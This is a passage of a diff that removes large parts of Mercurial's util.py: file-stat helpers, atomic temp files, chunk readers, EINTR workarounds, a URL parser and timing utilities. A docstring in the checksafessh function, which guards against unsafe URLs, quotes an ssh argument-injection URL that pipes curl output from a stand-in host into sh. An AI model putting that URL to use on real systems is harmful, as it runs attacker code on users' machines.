- Note that this function is unnecessary, and should not be
- called, for case-sensitive filesystems (simply because it's expensive).
-
- The root should be normcase-ed, too.
- '''
- def _makefspathcacheentry(dir):
- return dict((normcase(n), n) for n in os.listdir(dir))
-
- seps = pycompat.ossep
- if pycompat.osaltsep:
- seps = seps + pycompat.osaltsep
- # Protect backslashes. This gets silly very quickly.
- seps.replace('\\','\\\\')
- pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
- dir = os.path.normpath(root)
- result = []
- for part, sep in pattern.findall(name):
- if sep:
- result.append(sep)
- continue
-
- if dir not in _fspathcache:
- _fspathcache[dir] = _makefspathcacheentry(dir)
- contents = _fspathcache[dir]
-
- found = contents.get(part)
- if not found:
- # retry "once per directory" per "dirstate.walk" which
- # may take place for each patches of "hg qpush", for example
- _fspathcache[dir] = contents = _makefspathcacheentry(dir)
- found = contents.get(part)
-
- result.append(found or part)
- dir = os.path.join(dir, part)
-
- return ''.join(result)
-
-def checknlink(testfile):
- '''check whether hardlink count reporting works properly'''
-
- # testfile may be open, so we need a separate file for checking to
- # work around issue2543 (or testfile may get lost on Samba shares)
- f1, f2, fp = None, None, None
- try:
- fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
- suffix='1~', dir=os.path.dirname(testfile))
- os.close(fd)
- f2 = '%s2~' % f1[:-2]
-
- oslink(f1, f2)
- # nlinks() may behave differently for files on Windows shares if
- # the file is open.
- fp = posixfile(f2)
- return nlinks(f2) > 1
- except OSError:
- return False
- finally:
- if fp is not None:
- fp.close()
- for f in (f1, f2):
- try:
- if f is not None:
- os.unlink(f)
- except OSError:
- pass
-
-def endswithsep(path):
- '''Check path ends with os.sep or os.altsep.'''
- return (path.endswith(pycompat.ossep)
- or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
-
-def splitpath(path):
- '''Split path by os.sep.
- Note that this function does not use os.altsep because this is
- an alternative of simple "xxx.split(os.sep)".
- It is recommended to use os.path.normpath() before using this
- function if need.'''
- return path.split(pycompat.ossep)
-
-def gui():
- '''Are we running in a GUI?'''
- if pycompat.isdarwin:
- if 'SSH_CONNECTION' in encoding.environ:
- # handle SSH access to a box where the user is logged in
- return False
- elif getattr(osutil, 'isgui', None):
- # check if a CoreGraphics session is available
- return osutil.isgui()
- else:
- # pure build; use a safe default
- return True
- else:
- return pycompat.iswindows or encoding.environ.get("DISPLAY")
-
-def mktempcopy(name, emptyok=False, createmode=None):
- """Create a temporary file with the same contents from name
-
- The permission bits are copied from the original file.
-
- If the temporary file is going to be truncated immediately, you
- can use emptyok=True as an optimization.
-
- Returns the name of the temporary file.
- """
- d, fn = os.path.split(name)
- fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
- os.close(fd)
- # Temporary files are created with mode 0600, which is usually not
- # what we want. If the original file already exists, just copy
- # its mode. Otherwise, manually obey umask.
- copymode(name, temp, createmode)
- if emptyok:
- return temp
- try:
- try:
- ifp = posixfile(name, "rb")
- except IOError as inst:
- if inst.errno == errno.ENOENT:
- return temp
- if not getattr(inst, 'filename', None):
- inst.filename = name
- raise
- ofp = posixfile(temp, "wb")
- for chunk in filechunkiter(ifp):
- ofp.write(chunk)
- ifp.close()
- ofp.close()
- except: # re-raises
- try:
- os.unlink(temp)
- except OSError:
- pass
- raise
- return temp
-
-class filestat(object):
- """help to exactly detect change of a file
-
- 'stat' attribute is result of 'os.stat()' if specified 'path'
- exists. Otherwise, it is None. This can avoid preparative
- 'exists()' examination on client side of this class.
- """
- def __init__(self, stat):
- self.stat = stat
-
- @classmethod
- def frompath(cls, path):
- try:
- stat = os.stat(path)
- except OSError as err:
- if err.errno != errno.ENOENT:
- raise
- stat = None
- return cls(stat)
-
- @classmethod
- def fromfp(cls, fp):
- stat = os.fstat(fp.fileno())
- return cls(stat)
-
- __hash__ = object.__hash__
-
- def __eq__(self, old):
- try:
- # if ambiguity between stat of new and old file is
- # avoided, comparison of size, ctime and mtime is enough
- # to exactly detect change of a file regardless of platform
- return (self.stat.st_size == old.stat.st_size and
- self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
- self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
- except AttributeError:
- pass
- try:
- return self.stat is None and old.stat is None
- except AttributeError:
- return False
-
- def isambig(self, old):
- """Examine whether new (= self) stat is ambiguous against old one
-
- "S[N]" below means stat of a file at N-th change:
-
- - S[n-1].ctime < S[n].ctime: can detect change of a file
- - S[n-1].ctime == S[n].ctime
- - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
- - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
- - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
- - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
-
- Case (*2) above means that a file was changed twice or more at
- same time in sec (= S[n-1].ctime), and comparison of timestamp
- is ambiguous.
-
- Base idea to avoid such ambiguity is "advance mtime 1 sec, if
- timestamp is ambiguous".
-
- But advancing mtime only in case (*2) doesn't work as
- expected, because naturally advanced S[n].mtime in case (*1)
- might be equal to manually advanced S[n-1 or earlier].mtime.
-
- Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
- treated as ambiguous regardless of mtime, to avoid overlooking
- by confliction between such mtime.
-
- Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
- S[n].mtime", even if size of a file isn't changed.
- """
- try:
- return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
- except AttributeError:
- return False
-
- def avoidambig(self, path, old):
- """Change file stat of specified path to avoid ambiguity
-
- 'old' should be previous filestat of 'path'.
-
- This skips avoiding ambiguity, if a process doesn't have
- appropriate privileges for 'path'. This returns False in this
- case.
-
- Otherwise, this returns True, as "ambiguity is avoided".
- """
- advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
- try:
- os.utime(path, (advanced, advanced))
- except OSError as inst:
- if inst.errno == errno.EPERM:
- # utime() on the file created by another user causes EPERM,
- # if a process doesn't have appropriate privileges
- return False
- raise
- return True
-
- def __ne__(self, other):
- return not self == other
-
-class atomictempfile(object):
- '''writable file object that atomically updates a file
-
- All writes will go to a temporary copy of the original file. Call
- close() when you are done writing, and atomictempfile will rename
- the temporary copy to the original name, making the changes
- visible. If the object is destroyed without being closed, all your
- writes are discarded.
-
- checkambig argument of constructor is used with filestat, and is
- useful only if target file is guarded by any lock (e.g. repo.lock
- or repo.wlock).
- '''
- def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
- self.__name = name # permanent name
- self._tempname = mktempcopy(name, emptyok=('w' in mode),
- createmode=createmode)
- self._fp = posixfile(self._tempname, mode)
- self._checkambig = checkambig
-
- # delegated methods
- self.read = self._fp.read
- self.write = self._fp.write
- self.seek = self._fp.seek
- self.tell = self._fp.tell
- self.fileno = self._fp.fileno
-
- def close(self):
- if not self._fp.closed:
- self._fp.close()
- filename = localpath(self.__name)
- oldstat = self._checkambig and filestat.frompath(filename)
- if oldstat and oldstat.stat:
- rename(self._tempname, filename)
- newstat = filestat.frompath(filename)
- if newstat.isambig(oldstat):
- # stat of changed file is ambiguous to original one
- advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
- os.utime(filename, (advanced, advanced))
- else:
- rename(self._tempname, filename)
-
- def discard(self):
- if not self._fp.closed:
- try:
- os.unlink(self._tempname)
- except OSError:
- pass
- self._fp.close()
-
- def __del__(self):
- if safehasattr(self, '_fp'): # constructor actually did something
- self.discard()
-
- def __enter__(self):
- return self
-
- def __exit__(self, exctype, excvalue, traceback):
- if exctype is not None:
- self.discard()
- else:
- self.close()
-
-def unlinkpath(f, ignoremissing=False):
- """unlink and remove the directory if it is empty"""
- if ignoremissing:
- tryunlink(f)
- else:
- unlink(f)
- # try removing directories that might now be empty
- try:
- removedirs(os.path.dirname(f))
- except OSError:
- pass
-
-def tryunlink(f):
- """Attempt to remove a file, ignoring ENOENT errors."""
- try:
- unlink(f)
- except OSError as e:
- if e.errno != errno.ENOENT:
- raise
-
-def makedirs(name, mode=None, notindexed=False):
- """recursive directory creation with parent mode inheritance
-
- Newly created directories are marked as "not to be indexed by
- the content indexing service", if ``notindexed`` is specified
- for "write" mode access.
- """
- try:
- makedir(name, notindexed)
- except OSError as err:
- if err.errno == errno.EEXIST:
- return
- if err.errno != errno.ENOENT or not name:
- raise
- parent = os.path.dirname(os.path.abspath(name))
- if parent == name:
- raise
- makedirs(parent, mode, notindexed)
- try:
- makedir(name, notindexed)
- except OSError as err:
- # Catch EEXIST to handle races
- if err.errno == errno.EEXIST:
- return
- raise
- if mode is not None:
- os.chmod(name, mode)
-
-def readfile(path):
- with open(path, 'rb') as fp:
- return fp.read()
-
-def writefile(path, text):
- with open(path, 'wb') as fp:
- fp.write(text)
-
-def appendfile(path, text):
- with open(path, 'ab') as fp:
- fp.write(text)
-
-class chunkbuffer(object):
- """Allow arbitrary sized chunks of data to be efficiently read from an
- iterator over chunks of arbitrary size."""
-
- def __init__(self, in_iter):
- """in_iter is the iterator that's iterating over the input chunks."""
- def splitbig(chunks):
- for chunk in chunks:
- if len(chunk) > 2**20:
- pos = 0
- while pos < len(chunk):
- end = pos + 2 ** 18
- yield chunk[pos:end]
- pos = end
- else:
- yield chunk
- self.iter = splitbig(in_iter)
- self._queue = collections.deque()
- self._chunkoffset = 0
-
- def read(self, l=None):
- """Read L bytes of data from the iterator of chunks of data.
- Returns less than L bytes if the iterator runs dry.
-
- If size parameter is omitted, read everything"""
- if l is None:
- return ''.join(self.iter)
-
- left = l
- buf = []
- queue = self._queue
- while left > 0:
- # refill the queue
- if not queue:
- target = 2**18
- for chunk in self.iter:
- queue.append(chunk)
- target -= len(chunk)
- if target <= 0:
- break
- if not queue:
- break
-
- # The easy way to do this would be to queue.popleft(), modify the
- # chunk (if necessary), then queue.appendleft(). However, for cases
- # where we read partial chunk content, this incurs 2 dequeue
- # mutations and creates a new str for the remaining chunk in the
- # queue. Our code below avoids this overhead.
-
- chunk = queue[0]
- chunkl = len(chunk)
- offset = self._chunkoffset
-
- # Use full chunk.
- if offset == 0 and left >= chunkl:
- left -= chunkl
- queue.popleft()
- buf.append(chunk)
- # self._chunkoffset remains at 0.
- continue
-
- chunkremaining = chunkl - offset
-
- # Use all of unconsumed part of chunk.
- if left >= chunkremaining:
- left -= chunkremaining
- queue.popleft()
- # offset == 0 is enabled by block above, so this won't merely
- # copy via ``chunk[0:]``.
- buf.append(chunk[offset:])
- self._chunkoffset = 0
-
- # Partial chunk needed.
- else:
- buf.append(chunk[offset:offset + left])
- self._chunkoffset += left
- left -= chunkremaining
-
- return ''.join(buf)
-
-def filechunkiter(f, size=131072, limit=None):
- """Create a generator that produces the data in the file size
- (default 131072) bytes at a time, up to optional limit (default is
- to read all data). Chunks may be less than size bytes if the
- chunk is the last chunk in the file, or the file is a socket or
- some other type of file that sometimes reads less data than is
- requested."""
- assert size >= 0
- assert limit is None or limit >= 0
- while True:
- if limit is None:
- nbytes = size
- else:
- nbytes = min(limit, size)
- s = nbytes and f.read(nbytes)
- if not s:
- break
- if limit:
- limit -= len(s)
- yield s
-
-class cappedreader(object):
- """A file object proxy that allows reading up to N bytes.
-
- Given a source file object, instances of this type allow reading up to
- N bytes from that source file object. Attempts to read past the allowed
- limit are treated as EOF.
-
- It is assumed that I/O is not performed on the original file object
- in addition to I/O that is performed by this instance. If there is,
- state tracking will get out of sync and unexpected results will ensue.
- """
- def __init__(self, fh, limit):
- """Allow reading up to <limit> bytes from <fh>."""
- self._fh = fh
- self._left = limit
-
- def read(self, n=-1):
- if not self._left:
- return b''
-
- if n < 0:
- n = self._left
-
- data = self._fh.read(min(n, self._left))
- self._left -= len(data)
- assert self._left >= 0
-
- return data
-
- def readinto(self, b):
- res = self.read(len(b))
- if res is None:
- return None
-
- b[0:len(res)] = res
- return len(res)
-
def stringmatcher(pattern, casesensitive=True):
"""
accepts a string, possibly starting with 're:' or 'literal:' prefix.
@@ -2667,90 +135,6 @@ def ellipsis(text, maxlength=400):
"""Trim string to at most maxlength (default: 400) columns in display."""
return encoding.trim(text, maxlength, ellipsis='...')
-def unitcountfn(*unittable):
- '''return a function that renders a readable count of some quantity'''
-
- def go(count):
- for multiplier, divisor, format in unittable:
- if abs(count) >= divisor * multiplier:
- return format % (count / float(divisor))
- return unittable[-1][2] % count
-
- return go
-
-def processlinerange(fromline, toline):
- """Check that linerange <fromline>:<toline> makes sense and return a
- 0-based range.
-
- >>> processlinerange(10, 20)
- (9, 20)
- >>> processlinerange(2, 1)
- Traceback (most recent call last):
- ...
- ParseError: line range must be positive
- >>> processlinerange(0, 5)
- Traceback (most recent call last):
- ...
- ParseError: fromline must be strictly positive
- """
- if toline - fromline < 0:
- raise error.ParseError(_("line range must be positive"))
- if fromline < 1:
- raise error.ParseError(_("fromline must be strictly positive"))
- return fromline - 1, toline
-
-bytecount = unitcountfn(
- (100, 1 << 30, _('%.0f GB')),
- (10, 1 << 30, _('%.1f GB')),
- (1, 1 << 30, _('%.2f GB')),
- (100, 1 << 20, _('%.0f MB')),
- (10, 1 << 20, _('%.1f MB')),
- (1, 1 << 20, _('%.2f MB')),
- (100, 1 << 10, _('%.0f KB')),
- (10, 1 << 10, _('%.1f KB')),
- (1, 1 << 10, _('%.2f KB')),
- (1, 1, _('%.0f bytes')),
- )
-
-class transformingwriter(object):
- """Writable file wrapper to transform data by function"""
-
- def __init__(self, fp, encode):
- self._fp = fp
- self._encode = encode
-
- def close(self):
- self._fp.close()
-
- def flush(self):
- self._fp.flush()
-
- def write(self, data):
- return self._fp.write(self._encode(data))
-
-# Matches a single EOL which can either be a CRLF where repeated CR
-# are removed or a LF. We do not care about old Macintosh files, so a
-# stray CR is an error.
-_eolre = remod.compile(br'\r*\n')
-
-def tolf(s):
- return _eolre.sub('\n', s)
-
-def tocrlf(s):
- return _eolre.sub('\r\n', s)
-
-def _crlfwriter(fp):
- return transformingwriter(fp, tocrlf)
-
-if pycompat.oslinesep == '\r\n':
- tonativeeol = tocrlf
- fromnativeeol = tolf
- nativeeolwriter = _crlfwriter
-else:
- tonativeeol = pycompat.identity
- fromnativeeol = pycompat.identity
- nativeeolwriter = pycompat.identity
-
def escapestr(s):
# call underlying function of s.encode('string_escape') directly for
# Python 3 compatibility
@@ -2892,178 +276,6 @@ def wrap(line, width, initindent='', han
subsequent_indent=hangindent)
return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
-if (pyplatform.python_implementation() == 'CPython' and
- sys.version_info < (3, 0)):
- # There is an issue in CPython that some IO methods do not handle EINTR
- # correctly. The following table shows what CPython version (and functions)
- # are affected (buggy: has the EINTR bug, okay: otherwise):
- #
- # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
- # --------------------------------------------------
- # fp.__iter__ | buggy | buggy | okay
- # fp.read* | buggy | okay [1] | okay
- #
- # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
- #
- # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
- # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
- #
- # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
- # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
- # CPython 2, because CPython 2 maintains an internal readahead buffer for
- # fp.__iter__ but not other fp.read* methods.
- #
- # On modern systems like Linux, the "read" syscall cannot be interrupted
- # when reading "fast" files like on-disk files. So the EINTR issue only
- # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
- # files approximately as "fast" files and use the fast (unsafe) code path,
- # to minimize the performance impact.
- if sys.version_info >= (2, 7, 4):
- # fp.readline deals with EINTR correctly, use it as a workaround.
- def _safeiterfile(fp):
- return iter(fp.readline, '')
- else:
- # fp.read* are broken too, manually deal with EINTR in a stupid way.
- # note: this may block longer than necessary because of bufsize.
- def _safeiterfile(fp, bufsize=4096):
- fd = fp.fileno()
- line = ''
- while True:
- try:
- buf = os.read(fd, bufsize)
- except OSError as ex:
- # os.read only raises EINTR before any data is read
- if ex.errno == errno.EINTR:
- continue
- else:
- raise
- line += buf
- if '\n' in buf:
- splitted = line.splitlines(True)
- line = ''
- for l in splitted:
- if l[-1] == '\n':
- yield l
- else:
- line = l
- if not buf:
- break
- if line:
- yield line
-
- def iterfile(fp):
- fastpath = True
- if type(fp) is file:
- fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
- if fastpath:
- return fp
- else:
- return _safeiterfile(fp)
-else:
- # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
- def iterfile(fp):
- return fp
-
-def iterlines(iterator):
- for chunk in iterator:
- for line in chunk.splitlines():
- yield line
-
-def expandpath(path):
- return os.path.expanduser(os.path.expandvars(path))
-
-def hgcmd():
- """Return the command used to execute current hg
-
- This is different from hgexecutable() because on Windows we want
- to avoid things opening new shell windows like batch files, so we
- get either the python call or current executable.
- """
- if mainfrozen():
- if getattr(sys, 'frozen', None) == 'macosx_app':
- # Env variable set by py2app
- return [encoding.environ['EXECUTABLEPATH']]
- else:
- return [pycompat.sysexecutable]
- return gethgcmd()
-
-def rundetached(args, condfn):
- """Execute the argument list in a detached process.
-
- condfn is a callable which is called repeatedly and should return
- True once the child process is known to have started successfully.
- At this point, the child process PID is returned. If the child
- process fails to start or finishes before condfn() evaluates to
- True, return -1.
- """
- # Windows case is easier because the child process is either
- # successfully starting and validating the condition or exiting
- # on failure. We just poll on its PID. On Unix, if the child
- # process fails to start, it will be left in a zombie state until
- # the parent wait on it, which we cannot do since we expect a long
- # running process on success. Instead we listen for SIGCHLD telling
- # us our child process terminated.
- terminated = set()
- def handler(signum, frame):
- terminated.add(os.wait())
- prevhandler = None
- SIGCHLD = getattr(signal, 'SIGCHLD', None)
- if SIGCHLD is not None:
- prevhandler = signal.signal(SIGCHLD, handler)
- try:
- pid = spawndetached(args)
- while not condfn():
- if ((pid in terminated or not testpid(pid))
- and not condfn()):
- return -1
- time.sleep(0.1)
- return pid
- finally:
- if prevhandler is not None:
- signal.signal(signal.SIGCHLD, prevhandler)
-
-def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
- """Return the result of interpolating items in the mapping into string s.
-
- prefix is a single character string, or a two character string with
- a backslash as the first character if the prefix needs to be escaped in
- a regular expression.
-
- fn is an optional function that will be applied to the replacement text
- just before replacement.
-
- escape_prefix is an optional flag that allows using doubled prefix for
- its escaping.
- """
- fn = fn or (lambda s: s)
- patterns = '|'.join(mapping.keys())
- if escape_prefix:
- patterns += '|' + prefix
- if len(prefix) > 1:
- prefix_char = prefix[1:]
- else:
- prefix_char = prefix
- mapping[prefix_char] = prefix_char
- r = remod.compile(br'%s(%s)' % (prefix, patterns))
- return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
-
-def getport(port):
- """Return the port for a given network service.
-
- If port is an integer, it's returned as is. If it's a string, it's
- looked up using socket.getservbyname(). If there's no matching
- service, error.Abort is raised.
- """
- try:
- return int(port)
- except ValueError:
- pass
-
- try:
- return socket.getservbyname(pycompat.sysstr(port))
- except socket.error:
- raise Abort(_("no port number associated with service '%s'") % port)
-
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
'0': False, 'no': False, 'false': False, 'off': False,
'never': False}
@@ -3074,1270 +286,3 @@ def parsebool(s):
If s is not a valid boolean, returns None.
"""
return _booleans.get(s.lower(), None)
-
-class url(object):
- r"""Reliable URL parser.
-
- This parses URLs and provides attributes for the following
- components:
-
- <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
-
- Missing components are set to None. The only exception is
- fragment, which is set to '' if present but empty.
-
- If parsefragment is False, fragment is included in query. If
- parsequery is False, query is included in path. If both are
- False, both fragment and query are included in path.
-
- See http://www.ietf.org/rfc/rfc2396.txt for more information.
-
- Note that for backward compatibility reasons, bundle URLs do not
- take host names. That means 'bundle://../' has a path of '../'.
-
- Examples:
-
- >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
- <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
- >>> url(b'ssh://[::1]:2200//home/joe/repo')
- <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
- >>> url(b'file:///home/joe/repo')
- <url scheme: 'file', path: '/home/joe/repo'>
- >>> url(b'file:///c:/temp/foo/')
- <url scheme: 'file', path: 'c:/temp/foo/'>
- >>> url(b'bundle:foo')
- <url scheme: 'bundle', path: 'foo'>
- >>> url(b'bundle://../foo')
- <url scheme: 'bundle', path: '../foo'>
- >>> url(br'c:\foo\bar')
- <url path: 'c:\\foo\\bar'>
- >>> url(br'\\blah\blah\blah')
- <url path: '\\\\blah\\blah\\blah'>
- >>> url(br'\\blah\blah\blah#baz')
- <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
- >>> url(br'file:///C:\users\me')
- <url scheme: 'file', path: 'C:\\users\\me'>
-
- Authentication credentials:
-
- >>> url(b'ssh://joe:xyz@x/repo')
- <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
- >>> url(b'ssh://joe@x/repo')
- <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
-
- Query strings and fragments:
-
- >>> url(b'http://host/a?b#c')
- <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
- >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
- <url scheme: 'http', host: 'host', path: 'a?b#c'>
-
- Empty path:
-
- >>> url(b'')
- <url path: ''>
- >>> url(b'#a')
- <url path: '', fragment: 'a'>
- >>> url(b'http://host/')
- <url scheme: 'http', host: 'host', path: ''>
- >>> url(b'http://host/#a')
- <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
-
- Only scheme:
-
- >>> url(b'http:')
- <url scheme: 'http'>
- """
-
- _safechars = "!~*'()+"
- _safepchars = "/!~*'()+:\\"
- _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
-
- def __init__(self, path, parsequery=True, parsefragment=True):
- # We slowly chomp away at path until we have only the path left
- self.scheme = self.user = self.passwd = self.host = None
- self.port = self.path = self.query = self.fragment = None
- self._localpath = True
- self._hostport = ''
- self._origpath = path
-
- if parsefragment and '#' in path:
- path, self.fragment = path.split('#', 1)
-
- # special case for Windows drive letters and UNC paths
- if hasdriveletter(path) or path.startswith('\\\\'):
- self.path = path
- return
-
- # For compatibility reasons, we can't handle bundle paths as
- # normal URLS
- if path.startswith('bundle:'):
- self.scheme = 'bundle'
- path = path[7:]
- if path.startswith('//'):
- path = path[2:]
- self.path = path
- return
-
- if self._matchscheme(path):
- parts = path.split(':', 1)
- if parts[0]:
- self.scheme, path = parts
- self._localpath = False
-
- if not path:
- path = None
- if self._localpath:
- self.path = ''
- return
- else:
- if self._localpath:
- self.path = path
- return
-
- if parsequery and '?' in path:
- path, self.query = path.split('?', 1)
- if not path:
- path = None
- if not self.query:
- self.query = None
-
- # // is required to specify a host/authority
- if path and path.startswith('//'):
- parts = path[2:].split('/', 1)
- if len(parts) > 1:
- self.host, path = parts
- else:
- self.host = parts[0]
- path = None
- if not self.host:
- self.host = None
- # path of file:///d is /d
- # path of file:///d:/ is d:/, not /d:/
- if path and not hasdriveletter(path):
- path = '/' + path
-
- if self.host and '@' in self.host:
- self.user, self.host = self.host.rsplit('@', 1)
- if ':' in self.user:
- self.user, self.passwd = self.user.split(':', 1)
- if not self.host:
- self.host = None
-
- # Don't split on colons in IPv6 addresses without ports
- if (self.host and ':' in self.host and
- not (self.host.startswith('[') and self.host.endswith(']'))):
- self._hostport = self.host
- self.host, self.port = self.host.rsplit(':', 1)
- if not self.host:
- self.host = None
-
- if (self.host and self.scheme == 'file' and
- self.host not in ('localhost', '127.0.0.1', '[::1]')):
- raise Abort(_('file:// URLs can only refer to localhost'))
-
- self.path = path
-
- # leave the query string escaped
- for a in ('user', 'passwd', 'host', 'port',
- 'path', 'fragment'):
- v = getattr(self, a)
- if v is not None:
- setattr(self, a, urlreq.unquote(v))
-
- @encoding.strmethod
- def __repr__(self):
- attrs = []
- for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
- 'query', 'fragment'):
- v = getattr(self, a)
- if v is not None:
- attrs.append('%s: %r' % (a, v))
- return '<url %s>' % ', '.join(attrs)
-
- def __bytes__(self):
- r"""Join the URL's components back into a URL string.
-
- Examples:
-
- >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
- 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
- 'http://user:pw@host:80/?foo=bar&baz=42'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
- 'http://user:pw@host:80/?foo=bar%3dbaz'
- >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
- 'ssh://user:pw@[::1]:2200//home/joe#'
- >>> bytes(url(b'http://localhost:80//'))
- 'http://localhost:80//'
- >>> bytes(url(b'http://localhost:80/'))
- 'http://localhost:80/'
- >>> bytes(url(b'http://localhost:80'))
- 'http://localhost:80/'
- >>> bytes(url(b'bundle:foo'))
- 'bundle:foo'
- >>> bytes(url(b'bundle://../foo'))
- 'bundle:../foo'
- >>> bytes(url(b'path'))
- 'path'
- >>> bytes(url(b'file:///tmp/foo/bar'))
- 'file:///tmp/foo/bar'
- >>> bytes(url(b'file:///c:/tmp/foo/bar'))
- 'file:///c:/tmp/foo/bar'
- >>> print(url(br'bundle:foo\bar'))
- bundle:foo\bar
- >>> print(url(br'file:///D:\data\hg'))
- file:///D:\data\hg
- """
- if self._localpath:
- s = self.path
- if self.scheme == 'bundle':
- s = 'bundle:' + s
- if self.fragment:
- s += '#' + self.fragment
- return s
-
- s = self.scheme + ':'
- if self.user or self.passwd or self.host:
- s += '//'
- elif self.scheme and (not self.path or self.path.startswith('/')
- or hasdriveletter(self.path)):
- s += '//'
- if hasdriveletter(self.path):
- s += '/'
- if self.user:
- s += urlreq.quote(self.user, safe=self._safechars)
- if self.passwd:
- s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
- if self.user or self.passwd:
- s += '@'
- if self.host:
- if not (self.host.startswith('[') and self.host.endswith(']')):
- s += urlreq.quote(self.host)
- else:
- s += self.host
- if self.port:
- s += ':' + urlreq.quote(self.port)
- if self.host:
- s += '/'
- if self.path:
- # TODO: similar to the query string, we should not unescape the
- # path when we store it, the path might contain '%2f' = '/',
- # which we should *not* escape.
- s += urlreq.quote(self.path, safe=self._safepchars)
- if self.query:
- # we store the query in escaped form.
- s += '?' + self.query
- if self.fragment is not None:
- s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
- return s
-
- __str__ = encoding.strmethod(__bytes__)
-
- def authinfo(self):
- user, passwd = self.user, self.passwd
- try:
- self.user, self.passwd = None, None
- s = bytes(self)
- finally:
- self.user, self.passwd = user, passwd
- if not self.user:
- return (s, None)
- # authinfo[1] is passed to urllib2 password manager, and its
- # URIs must not contain credentials. The host is passed in the
- # URIs list because Python < 2.4.3 uses only that to search for
- # a password.
- return (s, (None, (s, self.host),
- self.user, self.passwd or ''))
-
- def isabs(self):
- if self.scheme and self.scheme != 'file':
- return True # remote URL
- if hasdriveletter(self.path):
- return True # absolute for our purposes - can't be joined()
- if self.path.startswith(br'\\'):
- return True # Windows UNC path
- if self.path.startswith('/'):
- return True # POSIX-style
- return False
-
- def localpath(self):
- if self.scheme == 'file' or self.scheme == 'bundle':
- path = self.path or '/'
- # For Windows, we need to promote hosts containing drive
- # letters to paths with drive letters.
- if hasdriveletter(self._hostport):
- path = self._hostport + '/' + self.path
- elif (self.host is not None and self.path
- and not hasdriveletter(path)):
- path = '/' + path
- return path
- return self._origpath
-
- def islocal(self):
- '''whether localpath will return something that posixfile can open'''
- return (not self.scheme or self.scheme == 'file'
- or self.scheme == 'bundle')
-
-def hasscheme(path):
- return bool(url(path).scheme)
-
-def hasdriveletter(path):
- return path and path[1:2] == ':' and path[0:1].isalpha()
-
-def urllocalpath(path):
- return url(path, parsequery=False, parsefragment=False).localpath()
-
-def checksafessh(path):
- """check if a path / url is a potentially unsafe ssh exploit (SEC)
-
- This is a sanity check for ssh urls. ssh will parse the first item as
- an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
- Let's prevent these potentially exploited urls entirely and warn the
- user.
-
- Raises an error.Abort when the url is unsafe.
- """
- path = urlreq.unquote(path)
- if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
- raise error.Abort(_('potentially unsafe url: %r') %
- (pycompat.bytestr(path),))
-
-def hidepassword(u):
- '''hide user credential in a url string'''
- u = url(u)
- if u.passwd:
- u.passwd = '***'
- return bytes(u)
-
-def removeauth(u):
- '''remove all authentication information from a url string'''
- u = url(u)
- u.user = u.passwd = None
- return str(u)
-
-timecount = unitcountfn(
- (1, 1e3, _('%.0f s')),
- (100, 1, _('%.1f s')),
- (10, 1, _('%.2f s')),
- (1, 1, _('%.3f s')),
- (100, 0.001, _('%.1f ms')),
- (10, 0.001, _('%.2f ms')),
- (1, 0.001, _('%.3f ms')),
- (100, 0.000001, _('%.1f us')),
- (10, 0.000001, _('%.2f us')),
- (1, 0.000001, _('%.3f us')),
- (100, 0.000000001, _('%.1f ns')),
- (10, 0.000000001, _('%.2f ns')),
- (1, 0.000000001, _('%.3f ns')),
- )
-
-_timenesting = [0]
-
-def timed(func):
- '''Report the execution time of a function call to stderr.
-
- During development, use as a decorator when you need to measure
- the cost of a function, e.g. as follows:
-
- @util.timed
- def foo(a, b, c):
- pass
- '''
-
- def wrapper(*args, **kwargs):
- start = timer()
- indent = 2
- _timenesting[0] += indent
- try:
- return func(*args, **kwargs)
- finally:
- elapsed = timer() - start
- _timenesting[0] -= indent
- stderr.write('%s%s: %s\n' %
